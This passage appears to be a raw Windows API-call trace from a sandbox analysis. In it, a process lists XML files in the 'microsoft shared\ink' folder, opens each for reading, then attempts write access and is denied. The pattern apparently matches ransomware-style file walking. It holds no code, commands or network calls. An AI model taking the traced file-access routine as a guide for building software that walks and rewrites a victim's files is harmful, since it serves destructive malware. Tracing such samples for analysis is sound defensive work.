0x5 [0100.145] SetLastError (dwErrCode=0x5) [0100.145] GetLastError () returned 0x5 [0100.145] SetLastError (dwErrCode=0x5) [0100.145] GetLastError () returned 0x5 [0100.145] SetLastError (dwErrCode=0x5) [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0100.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.145] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c96711d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c96711d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c96711d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsrom.xml", cAlternateFileName="")) returned 1 [0100.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.146] AreFileApisANSI () returned 1 [0100.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml", lpUsedDefaultChar=0x0) returned 62 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.146] AreFileApisANSI () returned 1 [0100.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e718 [0100.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 62 [0100.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.149] GetFileType (hFile=0x368) returned 0x1 [0100.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.149] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.149] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.149] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.150] CloseHandle (hObject=0x368) returned 1 [0100.150] AreFileApisANSI () returned 1 [0100.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e360 [0100.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e360, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 62 [0100.150] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.150] GetLastError () returned 0x5 [0100.150] GetLastError () returned 0x5 [0100.150] SetLastError (dwErrCode=0x5) [0100.150] GetLastError () returned 0x5 [0100.150] SetLastError (dwErrCode=0x5) [0100.150] GetLastError () returned 0x5 [0100.150] SetLastError (dwErrCode=0x5) [0100.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.150] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsrus.xml", cAlternateFileName="")) returned 1 [0100.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.151] AreFileApisANSI () returned 1 [0100.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml", lpUsedDefaultChar=0x0) returned 62 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0100.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.152] AreFileApisANSI () returned 1 [0100.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0100.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 62 [0100.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.152] GetFileType (hFile=0x368) returned 0x1 [0100.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.152] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.152] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.152] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.152] CloseHandle (hObject=0x368) returned 1 [0100.153] AreFileApisANSI () returned 1 [0100.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0100.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 62 [0100.153] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.153] GetLastError () returned 0x5 [0100.153] GetLastError () returned 0x5 [0100.153] SetLastError (dwErrCode=0x5) [0100.153] GetLastError () returned 0x5 [0100.153] SetLastError (dwErrCode=0x5) [0100.153] GetLastError () returned 0x5 [0100.153] SetLastError (dwErrCode=0x5) [0100.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0100.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.153] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.153] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipssrb.xml", cAlternateFileName="")) returned 1 [0100.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0100.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.154] AreFileApisANSI () returned 1 [0100.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml", lpUsedDefaultChar=0x0) returned 62 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0100.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.154] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.154] AreFileApisANSI () returned 1 [0100.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0100.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 62 [0100.155] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.155] GetFileType (hFile=0x368) returned 0x1 [0100.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.155] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.155] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.155] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.155] CloseHandle (hObject=0x368) returned 1 [0100.156] AreFileApisANSI () returned 1 [0100.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e3e8 [0100.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 62 [0100.156] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.156] GetLastError () returned 0x5 [0100.156] GetLastError () returned 0x5 [0100.157] SetLastError (dwErrCode=0x5) [0100.157] GetLastError () returned 0x5 [0100.157] SetLastError (dwErrCode=0x5) [0100.157] GetLastError () returned 0x5 [0100.157] SetLastError (dwErrCode=0x5) [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 